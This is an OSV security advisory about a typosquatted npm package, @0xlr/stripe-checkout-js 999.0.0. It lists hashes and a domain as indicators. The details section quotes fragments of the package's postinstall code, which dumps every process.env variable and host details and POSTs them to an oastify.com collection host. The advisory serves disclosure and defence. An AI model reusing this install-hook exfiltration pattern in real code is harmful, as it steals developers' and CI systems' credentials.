MAL-2026-5388

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@0xlr/stripe-checkout-js/MAL-2026-5388.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5388
Published
2026-06-09T16:07:30Z
Modified
2026-06-09T17:16:28.972344981Z
Summary
Malicious code in @0xlr/stripe-checkout-js (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566)

On npm install, postinstall.js enumerates the full process.env keyspace plus host identifiers (os.hostname(), username, homedir, cwd, argv, OS details) and POSTs the resulting JSON payload over HTTPS to rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com — a Burp Collaborator out-of-band subdomain used as attacker-controlled exfiltration infrastructure. The relevant code is Object.keys(process.env).sort().forEach(k => { env[k] = process.env[k]; }) followed by https.request({hostname: 'rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com', port: 443,..., method: 'POST'}). On developer and CI hosts, process.env routinely contains credential-grade values (AWS_*, NPMTOKEN, GITHUBTOKEN, CI/CD secrets), all of which are captured and shipped off-host without consent. The package name typosquats the legitimate stripe-checkout-js, and the version (999.0.0) is consistent with a placeholder/squat release rather than a real maintained library.

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "999.0.0"
            ],
            "sha256": "44686181e7933593b67bda202e35b54f8d9927ac721f1836bcf91a7ee7ec00ff",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T16:07:30Z",
            "id": "IN-MAL-2026-004970",
            "import_time": "2026-06-09T16:59:45.171006742Z"
        },
        {
            "versions": [
                "999.0.0"
            ],
            "sha256": "65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T16:07:30Z",
            "id": "IN-MAL-2026-004969",
            "import_time": "2026-06-09T16:59:45.125117471Z"
        }
    ]
}
References
Credits

Affected packages

npm / @0xlr/stripe-checkout-js

Package

Name
@0xlr/stripe-checkout-js
View open source insights on deps.dev
Purl
pkg:npm/%400xlr%2Fstripe-checkout-js

Affected ranges

Affected versions

999.*
999.0.0

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "stripe-checkout-js-999.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-/Hnw/Gt3/JDVqZDYgbPnRSeKD1n1bDZaLogF+oUQEzKhtD3lD+E5WAyv5Xx5Mi19EUI/37l24RQvYwSO3OyIgQ==",
                "sha1": "00eae02c4d1a0d7050ff4ab7d79f4d6b007a8a8d"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "1ded8a789cf3732b19e4d08f9f8b224a4c81914daad56d165ca4fbce8cf21e07",
            "path": "postinstall.js",
            "tlsh": "762115e152f4867413f23b88b09e95015677f1173a0778f4bdcd52151fac62812f2579"
        }
    ],
    "domains": [
        "rytxau88zxh61dw6qz4yn19naeg54vsk.oastify.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@0xlr/stripe-checkout-js/MAL-2026-5388.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]